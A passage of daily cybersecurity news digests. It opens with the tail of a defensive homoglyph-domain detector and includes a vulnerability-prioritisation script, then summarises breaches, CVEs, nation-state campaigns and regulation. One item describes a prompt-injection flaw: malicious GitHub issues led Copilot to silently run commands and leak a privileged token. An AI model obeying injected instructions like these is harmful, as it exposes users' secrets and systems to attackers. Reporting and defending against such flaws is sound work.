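def letter_scripts(label: str) -> Set[str]:
    """Unicode script names (LATIN, CYRILLIC, ...) of the letters in a label."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in label if ch.isalpha()}


def skeleton(label: str) -> str:
    """Map confusable Cyrillic letters to their Latin lookalikes."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in label.lower())


def analyze(domain: str, protected: Set[str] = PROTECTED) -> Dict:
    """Classify one domain: mixed scripts and/or a skeleton that equals a protected name."""
    labels = [decode_label(lab) for lab in domain.lower().rstrip(".").split(".")]
    # Crude registrable-label pick; a real tool would consult the public suffix list.
    registrable = labels[-2] if len(labels) >= 2 else labels[0]
    skel = skeleton(registrable)
    impersonates = skel if skel in protected and skel != registrable else None
    mixed = len(letter_scripts(registrable)) > 1
    return {"domain": ".".join(labels), "mixed_script": mixed, "skeleton": skel,
            "impersonates": impersonates, "suspicious": mixed or impersonates is not None}


def scan(domains: List[str] = SAMPLE_DOMAINS, protected: Set[str] = PROTECTED) -> List[Dict]:
    return [analyze(d, protected) for d in domains]


if __name__ == "__main__":
    for result in scan():
        print(result)
```

The all-Cyrillic case matters: a domain made entirely of confusables has no script mixing to flag, so the skeleton comparison is what catches it. Feeding this new certificate-transparency entries or newly registered domains against your own brand list is the cheap version of the monitoring that would have surfaced the 52 campaign domains early.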

Vulnerabilities: RCE, Active Exploitation, and Zero-Days 🔒

- Five Eyes agencies issued urgent warnings about a critical authentication bypass vulnerability (CVE-2026-20127) in Cisco Catalyst SD-WAN, actively exploited as a zero-day since 2023. Attackers can gain high-privileged access, add rogue peers, and potentially escalate to root by exploiting CVE-2022-20775. Immediate patching, restricted WAN exposure, and hunting for IoCs are crucial.
- Zyxel has released security updates for a critical Remote Code Execution (RCE) vulnerability (CVE-2025-13942) affecting over a dozen router models. The flaw in the UPnP function allows unauthenticated attackers to execute OS commands via crafted SOAP requests, though WAN access must also be enabled for remote exploitation.

🗞️ The Record | https://therecord.media/five-eyes-warn-hackers-exploit-cisco-sd-wan
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/critical-cisco-sd-wan-bug-exploited-in-zero-day-attacks-since-2023/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/zyxel-warns-of-critical-rce-flaw-affecting-over-a-dozen-routers/

Threat Landscape Commentary 🌍

- A VulnCheck report highlights that despite over 40,000 new vulnerabilities published in 2025, only 422 (1%) were actively exploited in the wild. This underscores the need for defenders to prioritise based on known exploited vulnerabilities, as network edge devices remain prime targets.
- While AI models like Anthropic's Claude Code Security are effective at identifying software vulnerabilities (500+ in open-source codebases), security researchers note a significant gap in their ability to propose actionable fixes. The sheer volume of AI-generated reports is overwhelming maintainers, highlighting that discovery is cheap, but remediation is hard.
- Researchers from Georgia Tech found that the global threat intelligence (TI) ecosystem is vulnerable to adversarial actions and geopolitical fragmentation. Their study revealed many security vendors conduct shallow malware analysis and rarely share binaries, leading to slow information propagation.
- A new "Operational Technology Incident (OTI) Impact Score" model, inspired by the Richter Scale, has been developed to provide a standardised way to measure the impact of OT cybersecurity incidents. It scores events based on severity, reach, and duration, aiming to offer clearer communication for executives, governments, and insurers.

🤫 CyberScoop | https://cyberscoop.com/vulncheck-exploited-vulnerabilities-report-2025/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/24/ai_finding_bugs/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/25/threat_intelligence_supply_chain_research/
🕶️ Dark Reading | https://www.darkreading.com/ics-ot-security/richter-scale-model-measures-cyber-incidents
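The VulnCheck figure above (roughly 1% of published CVEs actually exploited) is the argument for ranking a backlog by exploitation evidence first and CVSS second. The script below is an added example of that ranking, not VulnCheck's or CISA's code; the host inventory and the KEV-style feed are constructed (the CVE IDs are placeholders, and the field names follow the CISA KEV JSON shape), and the tiering rules are one reasonable policy rather than a standard.

```python
"""Rank a vulnerability backlog by exploitation evidence, then exposure, then CVSS.
Added example with a constructed inventory and a constructed KEV-style feed;
the CVE IDs below are placeholders, not real vulnerabilities."""
import json
from typing import Dict, List

# Constructed feed in the shape of CISA's KEV JSON (cveID, dateAdded,
# dueDate, knownRansomwareCampaignUse).
KEV_FEED_JSON = """{"vulnerabilities": [
  {"cveID": "CVE-0000-0001", "dateAdded": "2026-02-20", "dueDate": "2026-03-13",
   "knownRansomwareCampaignUse": "Known"},
  {"cveID": "CVE-0000-0002", "dateAdded": "2026-02-24", "dueDate": "2026-03-17",
   "knownRansomwareCampaignUse": "Unknown"}
]}"""

# Constructed scanner output: host, CVE, CVSS base score, network exposure.
INVENTORY: List[Dict] = [
    {"host": "edge-fw-01", "cve": "CVE-0000-0001", "cvss": 7.2, "exposure": "internet"},
    {"host": "app-db-07",  "cve": "CVE-0000-0003", "cvss": 9.8, "exposure": "internal"},
    {"host": "vpn-gw-02",  "cve": "CVE-0000-0002", "cvss": 8.1, "exposure": "internet"},
    {"host": "build-01",   "cve": "CVE-0000-0001", "cvss": 7.2, "exposure": "internal"},
    {"host": "web-04",     "cve": "CVE-0000-0004", "cvss": 9.1, "exposure": "internet"},
    {"host": "ws-113",     "cve": "CVE-0000-0002", "cvss": 8.1, "exposure": "internal"},
]


def load_kev(feed_json: str) -> Dict[str, Dict]:
    """Index the feed by CVE ID for O(1) lookups."""
    return {v["cveID"]: v for v in json.loads(feed_json)["vulnerabilities"]}


def tier(finding: Dict, kev: Dict[str, Dict]) -> int:
    """0 = exploited and reachable from the internet (or used by ransomware),
    1 = exploited but internal only, 2 = unexploited critical on the edge,
    3 = everything else. CVSS only breaks ties within a tier."""
    entry = kev.get(finding["cve"])
    exposed = finding["exposure"] == "internet"
    if entry and (exposed or entry.get("knownRansomwareCampaignUse") == "Known"):
        return 0
    if entry:
        return 1
    if exposed and finding["cvss"] >= 9.0:
        return 2
    return 3


def prioritise(inventory: List[Dict], kev: Dict[str, Dict]) -> List[Dict]:
    """Stable sort by (tier, -cvss) and annotate each finding with its tier and KEV due date."""
    ranked = sorted(inventory, key=lambda f: (tier(f, kev), -f["cvss"]))
    return [dict(f, tier=f"P{tier(f, kev)}", kev_due=kev.get(f["cve"], {}).get("dueDate"))
            for f in ranked]


def summary(ranked: List[Dict]) -> Dict[str, int]:
    return {t: sum(1 for f in ranked if f["tier"] == t) for t in ("P0", "P1", "P2", "P3")}


def run() -> List[Dict]:
    return prioritise(INVENTORY, load_kev(KEV_FEED_JSON))


if __name__ == "__main__":
    for f in run():
        print(f"{f['tier']} {f['host']:<11} {f['cve']} cvss={f['cvss']} due={f['kev_due']}")
```

Note where the CVSS 9.8 finding lands: last, because it is neither exploited nor reachable. That inversion relative to a pure CVSS sort is the whole point of the report's numbers, and the KEV due date gives the P0/P1 items a deadline that is externally defensible.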

Regulatory Issues and Changes ⚖️

- Peter Williams, former general manager of L3Harris's cybersecurity unit, was sentenced to 87 months in prison for stealing and selling eight zero-day exploits to Russian broker Operation Zero. The US Treasury also sanctioned Operation Zero (Matrix LLC), its owner Sergey Zelenyuk, and associated entities, marking the first use of the Protecting American Intellectual Property Act (PAIPA).
- Interpol, with law enforcement from 16 African countries and private companies, conducted "Operation Red Card 2.0," leading to 651 arrests and recovering over $4.3 million. The operation targeted investment fraud, mobile loan fraud, and cybercrime syndicates, highlighting growing efforts against cybercrime in Africa.
- China's top prosecutorial agency is intensifying criminal enforcement against commercial espionage and technology leaks to protect domestic innovation. Over 1,200 business secret infringement cases were handled from 2021-2024, focusing on AI, biomanufacturing, and energy sectors.

🤫 CyberScoop | https://cyberscoop.com/l3harris-executive-peter-williams-sentenced-zero-day-exploits-russian-broker/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/ex-l3harris-exec-jailed-for-selling-zero-days-to-russian-exploit-broker/
🚨 The Hacker News | https://thehackernews.com/2026/02/defense-contractor-employee-jailed-for.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/25/former_l3harris_exec_jailed/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/us-sanctions-russian-exploit-broker-for-buying-stolen-zero-days/
🕶️ Dark Reading | https://www.darkreading.com/cybersecurity-operations/operation-red-card-2-0-leads-to-651-arrests-in-africa
🗞️ The Record | https://therecord.media/china-domestic-ip-theft-crackdown

Government Staffing or Program Changes 🏛️

- The Cybersecurity and Infrastructure Security Agency (CISA) is reportedly "decimated" and "in trouble" a year into the second Trump administration. The agency has lost roughly a third of its personnel, shuttered divisions (like election security), and seen a decline in morale due to political backlash, leading to diminished capabilities.

🤫 CyberScoop | https://cyberscoop.com/cisa-personnel-cuts-trump-second-term-analysis/

Everything Else 🌐

- A Moscow resident, Ruslan Satuchin, is accused of attempting to extort money from the notorious Conti ransomware group by posing as an FSB officer. He allegedly contacted Conti members in September 2022, demanding payment to avoid criminal prosecution.

🗞️ The Record | https://therecord.media/moscow-man-accused-of-extorting-conti-gang

#CyberSecurity #ThreatIntelligence #Ransomware #NationState #APT #ZeroDay #Vulnerability #Phishing #AI #DataBreach #IncidentResponse #Cybercrime #InfoSec #CISA #OTSecurity

Wynn Resorts confirms employee data breach after extortion threat

Wynn Resorts has confirmed that a hacker stole employee data from its systems after the company was listed on the ShinyHunters extortion gang's data leak site.

BleepingComputer

Hello cyber practitioners! It's been a busy 24 hours with a flurry of activity across data breaches, nation-state operations, critical vulnerabilities, and some interesting discussions around AI and privacy. Let's dive in:

Recent Cyber Attacks or Breaches ⚠️

- The ShinyHunters extortion gang has claimed responsibility for breaching Dutch telecom Odido, impacting 6.2 million customers, and digital auto platform CarGurus, exposing data from 12.4 million accounts. The group often uses voice phishing (vishing) to compromise single sign-on (SSO) accounts.
- The FBI reported a significant surge in ATM jackpotting attacks in 2025, with criminals cracking 700 machines and costing banks over $20 million. Attackers frequently use malware like Ploutus to manipulate the eXtensions for Financial Services (XFS) software, forcing cash dispensing.
- Spanish authorities arrested four alleged members of the "Anonymous Fénix" hacktivist group for distributed denial-of-service (DDoS) attacks against government ministries and public institutions in Spain and South America, particularly after the Valencia floods.
- Two South Korean teenagers were charged for breaching Seoul's Ttareungyi public bike service in June 2024, exposing data of 4.62 million users, including IDs, phone numbers, and home addresses.
- The UAE Cyber Security Council claimed to have thwarted an organised 'terrorist' ransomware attack targeting its digital infrastructure and vital sectors, noting the use of AI technologies to develop sophisticated offensive tools.
- Decentralised finance platform Step Finance is shutting down after a $40 million theft from its treasury in January, following the compromise of executive team devices.
- Researchers uncovered and took down the infrastructure of Diesel Vortex, a Russian-linked cybercrime group that stole over 1,600 login credentials from Western cargo companies, enabling freight shipment diversion and check fraud.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/shinyhunters-extortion-gang-claims-odido-breach-affecting-millions/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/cargurus-data-breach-exposes-information-of-124-million-accounts/
🌑 Dark Reading | https://www.darkreading.com/cyber-risk/atm-jackpotting-attacks-surged-2025
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/spain-arrests-suspected-anonymous-fenix-hacktivists-for-ddosing-govt-sites/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/24/korean_bike_breach_charges/
🗞️ The Record | https://therecord.media/uae-claims-it-stopped-terrorist-ransomware-attack
🗞️ The Record | https://therecord.media/step-finance-cryptocurrency-theft-shutdown
🗞️ The Record | https://therecord.media/phishing-operation-russia-armenia-targeting-us-european-cargo

New Threat Research on Threat Actors/Groups, Ransomware, Malware, or Techniques and Tradecraft 🛡️

- North Korea's Lazarus Group (specifically the Andariel/Stonefly subgroup) is now deploying Medusa ransomware in financially motivated attacks, targeting US healthcare organisations and an unnamed entity in the Middle East. This marks a shift from their self-developed strains to using ransomware-as-a-service (RaaS) offerings.
- The China-aligned UnsolicitedBooker threat cluster has shifted its focus from Saudi Arabian entities to telecommunications companies in Kyrgyzstan and Tajikistan. They are deploying LuciDoor and MarsSnake backdoors via malicious Microsoft Office documents and phishing links.
- Anthropic accused three Chinese AI labs (DeepSeek, Moonshot, MiniMax) of "industrial-scale campaigns" involving 24,000 fraudulent accounts and 16 million queries to illicitly distill Claude's capabilities. This "illicit distillation" poses national security risks if these unprotected models are used for offensive cyber operations, disinformation, or mass surveillance.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/north-korean-lazarus-group-linked-to-medusa-ransomware-attacks/
🗞️ The Record | https://therecord.media/north-korean-hackers-using-medusa-ransomware
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/24/north_koreas_lazarus_group_healthcare_medusa_ransomware/
📰 The Hacker News | https://thehackernews.com/2026/02/unsolicitedbooker-targets-central-asian.html
🤫 CyberScoop | https://cyberscoop.com/anthropic-accuses-chinese-labs-ai-distillation-cyber-risk/
📰 The Hacker News | https://thehackernews.com/2026/02/anthropic-says-chinese-ai-firms-used-16.html

Vulnerabilities, especially any mentioning Remote Code Execution (RCE), Active Exploitation, or Zero-Days 🚨

- SolarWinds has released patches for four critical Serv-U vulnerabilities (CVE-2025-40538, CVE-2025-40540, CVE-2025-40539, CVE-2025-40541), all rated CVSS 9.1. The flaws, which include a broken access control issue and type confusion bugs, could allow attackers who already hold high privileges to gain root access and execute arbitrary code on unpatched servers. Updating to Serv-U 15.5.4 immediately is strongly advised.
- A vulnerability dubbed RoguePilot in GitHub Codespaces allowed prompt injection via malicious GitHub issues. This enabled GitHub Copilot to silently execute commands and leak sensitive data, such as the privileged GITHUB_TOKEN, representing an AI-mediated supply chain attack. Microsoft has since patched the flaw.
- Researchers uncovered over 1,500 security vulnerabilities, including 54 high-severity issues, across ten popular Android mental health applications with a combined 14.7 million installs. These flaws could expose sensitive therapy data, allow credential interception, spoof notifications, and bypass root detection.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/critical-solarwinds-serv-u-flaws-offer-root-access-to-servers/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/24/patch_these_4_critical_makemeroot/
📰 The Hacker News | https://thehackernews.com/2026/02/roguepilot-flaw-in-github-codespaces.html
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/android-mental-health-apps-with-147m-installs-filled-with-security-flaws/

Threat Landscape Commentary 🌍

- The FBI has affirmed its commitment to combating transnational criminal networks operating industrial-scale scamming compounds in Southeast Asia. These operations traffic individuals and facilitate pig-butchering and cryptocurrency investment scams, generating billions in illicit funds.

🗞️ The Record | https://therecord.media/us-committed-to-fighting-southeast-asia-scam-compounds

Data Privacy 🔒

- Microsoft is expanding its Purview Data Loss Prevention (DLP) controls for Microsoft 365 Copilot to block the processing of confidential Word, Excel, and PowerPoint documents across all storage locations, including local files. This enhancement aims to provide consistent protection and addresses previous bugs where Copilot could summarise protected emails.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/microsoft/microsoft-adds-copilot-data-controls-to-all-storage-locations/

Regulatory Issues or Changes ⚖️

- The UK Information Commissioner's Office (ICO) has fined Reddit £14.47 million (over $19.5 million) for unlawfully processing children's data. Reddit failed to implement adequate age assurance mechanisms until July 2025, despite its own terms of service prohibiting users under 13. Reddit plans to appeal the decision.
- Senior Ukrainian officials are pushing for tighter regulation of the messaging app Telegram, citing its frequent use by Russia for recruiting individuals for sabotage and terrorist attacks, as well as for spreading disinformation.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/24/uk_data_watchdog_fines_reddit_1447m_for_letting_kids_slip_past_the_gate/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/uk-fines-reddit-19-million-for-using-childrens-data-unlawfully/
🗞️ The Record | https://therecord.media/ukraine-telegram-regulation-russia-sabotage-recruitment

Everything Else ⚙️

- Go library maintainer Filippo Valsorda criticised GitHub's Dependabot, labelling it a "noise machine" for generating excessive false positives and "nonsensical" CVSS scores. He argues this leads to alert fatigue and reduces security effectiveness, recommending static analysis tools like `govulncheck` instead.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/24/github_dependabot_noise_machine/

#CyberSecurity #ThreatIntelligence #Ransomware #NationState #APT #DataBreach #Vulnerability #RCE #AI #DataPrivacy #InfoSec #CyberAttack #Malware #IncidentResponse #Hacktivism #FinancialCrime #RegulatoryCompliance

ShinyHunters extortion gang claims Odido breach affecting millions

The ShinyHunters extortion gang has claimed responsibility for breaching Dutch telecommunications provider Odido and stealing millions of user records from its compromised systems.

BleepingComputer

It's been a busy 24 hours in the cyber world with significant updates on actively exploited vulnerabilities, recent data breaches, and a deep dive into evolving nation-state tactics. Let's take a look:

Actively Exploited Vulnerabilities & Zero-Days ⚠️

- A critical pre-authentication RCE (CVE-2026-1731, CVSS 9.9) in BeyondTrust Remote Support and Privileged Remote Access appliances is now being actively exploited. Attackers are using specially crafted client requests to extract `x-ns-company` values and establish WebSocket channels for command execution. On-premise customers must patch immediately.
- A critical SQL injection vulnerability (CVE-2024-43468, CVSS 9.8) in Microsoft Configuration Manager, patched in October 2024, is now under active exploitation. It allows unauthenticated remote attackers to execute commands on the server or the underlying database. CISA has added it to its KEV catalog, urging federal agencies to patch by March 5th.
- Apple has disclosed its first actively exploited zero-day of 2026, a memory corruption flaw (CVE-2026-20700) in `dyld` affecting iPhones and iPads running iOS versions prior to 26. This vulnerability was used in "extremely sophisticated attacks against specific targeted individuals," likely for commercial spyware.
- Two critical RCE vulnerabilities (CVE-2026-1281, CVE-2026-1340, CVSS 9.8) in Ivanti Endpoint Manager Mobile (EPMM) are being actively exploited, leading to compromises of several European government agencies, including the European Commission and Dutch and Finnish governments. This highlights the ongoing challenge of securing widely deployed edge devices.
- CISA also added CVE-2025-15556 (Notepad++ download integrity bypass) and CVE-2025-40536 (SolarWinds Web Help Desk security control bypass) to its KEV catalog. The Notepad++ flaw was exploited by the China-linked Lotus Blossom APT to deliver the Chrysalis backdoor via trojanised installers, targeting specific high-value individuals.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/critical-beyondtrust-rce-flaw-now-exploited-in-attacks-patch-now/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/13/critical_microsoft_bug_from_2024/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/cisa-flags-microsoft-configmgr-rce-flaw-as-exploited-in-attacks/
🤫 CyberScoop | https://cyberscoop.com/apple-zero-day-vulnerability-cve-2026-20700/
📰 The Hacker News | https://thehackernews.com/2026/02/researchers-observe-in-wild.html
👻 Dark Reading | https://www.darkreading.com/endpoint-security/ivanti-epmm-zero-day-bugs-exploit

Recent Cyber Attacks & Breaches 🚨

- Louis Vuitton, Christian Dior Couture, and Tiffany have been collectively fined $25 million by South Korea for inadequate security leading to data exposure for over 5.5 million customers. Breaches stemmed from malware on an employee device and phishing attacks compromising a shared cloud-based customer management service.
- The Netherlands' largest mobile network operator, Odido, disclosed a breach of its customer contact system affecting approximately 6.2 million people. Stolen data includes names, addresses, phone numbers, dates of birth, bank account numbers, and ID document details, prompting warnings about potential impersonation and phishing scams.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/louis-vuitton-dior-and-tiffany-fined-25-million-over-data-breaches/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/13/odido_breach/

New Threat Research & Techniques 🔬

- Google's Threat Intelligence Group (GTIG) has attributed attacks on Ukrainian defense, military, government, and energy organisations using CANFAIL malware to a previously undocumented threat actor that is possibly affiliated with Russian intelligence. The group is noted for using Large Language Models (LLMs) for reconnaissance, lure creation, and basic technical questions about C2 setup.
- Threat actors are leveraging Claude LLM artifacts and Google Ads in "ClickFix" campaigns to deliver Mac infostealer malware. Malicious search results lead users to public Claude guides or fake Apple Support pages that instruct them to execute shell commands in Terminal; those commands fetch the MacSync infostealer, which exfiltrates sensitive system data.
- Nation-state actors, particularly China and Russia, are aggressively targeting the Defense Industrial Base (DIB), employing zero-day exploits against edge devices (VPNs, security gateways) for initial access and "pre-positioning" in networks. This strategy aims for persistent intelligence collection during peacetime and disruption options during crises, with a focus on devices often slower to patch and less monitored.
- Microsoft faces increasing pressure over Bring-Your-Own-Vulnerable-Driver (BYOVD) attacks, where threat actors exploit legitimate, but vulnerable, drivers to disable security products with kernel-level access. Despite Microsoft's efforts, gaps exist, such as allowing drivers with revoked certificates, and slow blocklist updates, making it a persistent challenge for defenders.
- A security researcher demonstrated multiple techniques to manipulate Windows LNK shortcut files, allowing attackers to display a benign target in file properties while executing a malicious payload. Microsoft's Security Response Center declined to classify these as vulnerabilities, citing user interaction, despite historical exploitation of similar LNK flaws.
- npm has overhauled its authentication, revoking classic tokens and defaulting to short-lived, session-based tokens with MFA for publishing, and encouraging OIDC Trusted Publishing. While a significant step, risks remain as MFA phishing can still yield short-lived tokens, and optional MFA bypass for 90-day tokens leaves a vulnerability similar to previous classic tokens.

📰 The Hacker News | https://thehackernews.com/2026/02/google-ties-suspected-russian-actor-to.html
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/
👻 Dark Reading | https://www.darkreading.com/cyber-risk/nation-state-hackers-defense-industrial-base-under-siege
👻 Dark Reading | https://www.darkreading.com/application-security/microsoft-under-pressure-defenses-byovd-attacks
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/microsoft/microsoft-new-windows-lnk-spoofing-issues-arent-vulnerabilities/
📰 The Hacker News | https://thehackernews.com/2026/02/npms-update-to-harden-their-supply.html

Threat Landscape & Geopolitics 🌍

- Estonia's foreign intelligence chief urged European governments and industry to invest in homegrown offensive cyber capabilities, arguing that Europe is too reliant on non-European tools and needs to match adversaries' ability to penetrate, disrupt, or manipulate digital systems.
- Taiwan warns that China may be rehearsing a "digital siege" using platforms like "Expedition Cloud" to simulate attacks on critical infrastructure. This suggests a shift from espionage to disruption, with Taiwan serving as a proving ground for new, aggressive cyber tactics.
- NATO's deputy secretary general stated that the alliance must be ready to impose costs on Russia and China for cyber and hybrid attacks, which increasingly target critical infrastructure and government services. This includes strengthening defense, boosting innovation, and integrating military, civilian, and industry efforts.
- The EU's top tech official warned that Europe can no longer be "naive" about adversaries' ability to shut down critical infrastructure. She called for tougher rules, more investment, and phasing out high-risk suppliers (like Huawei/ZTE) to protect against coordinated cyber and physical threats.
- Officials and executives at the Munich Cyber Security Conference highlighted space as the next arena of great power competition, vulnerable to disruption. Concerns include the reliance of modern life on satellites and the vulnerability of subsea cables, with calls for independent "outernet" satellite networks to ensure resilience.
- Sweden's Ministry of Defence states that cyber and hybrid threats are now a permanent feature of Europe's security environment. Societies must be built to function under sustained pressure, rather than assuming disruptions are rare, emphasising a "total defense" concept with strong public-private cooperation.

🗞️ The Record | https://therecord.media/estonia-spy-chief-calls-on-europe-to-invest-in-own-offense
🗞️ The Record | https://therecord.media/china-taiwan-digital-siege-munich
🗞️ The Record | https://therecord.media/nato-must-impost-costs-russia-china-cyber-hybrid-deputy-secretary
🗞️ The Record | https://therecord.media/eu-cyber-critical-infrastructure-tech
🗞️ The Record | https://therecord.media/space-cybersecurity-new-front-war
🗞️ The Record | https://therecord.media/sweden-cyber-threats-europe-permanent

Regulatory & Communication Blockades 🔒

- The Russian government is intensifying its crackdown on communication platforms outside its control, attempting to fully block WhatsApp and aggressively throttling Telegram. This move aims to encourage citizens to use the Kremlin-controlled MAX messenger app, which has raised privacy concerns.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/russia-tries-to-block-whatsapp-telegram-in-communication-blockade/

Industry News / Acquisitions 🤝

- Proofpoint has acquired AI security startup Acuvity to address the growing security risks associated with widespread corporate adoption of agentic AI. This move aims to strengthen Proofpoint's capabilities in monitoring and securing AI-powered systems, tackling new attack vectors like prompt injection and model manipulation.

🤫 CyberScoop | https://cyberscoop.com/proofpoint-acuvity-deal-agentic-ai-security/

#CyberSecurity #ThreatIntelligence #Vulnerabilities #ZeroDay #RCE #DataBreach #NationState #APT #Malware #AI #LLM #SupplyChainSecurity #CriticalInfrastructure #Geopolitics #InfoSec #CyberAttack #IncidentResponse

Critical BeyondTrust RCE flaw now exploited in attacks, patch now

A critical pre-authentication remote code execution vulnerability in BeyondTrust Remote Support and Privileged Remote Access appliances is now being exploited in attacks after a PoC was published online.

BleepingComputer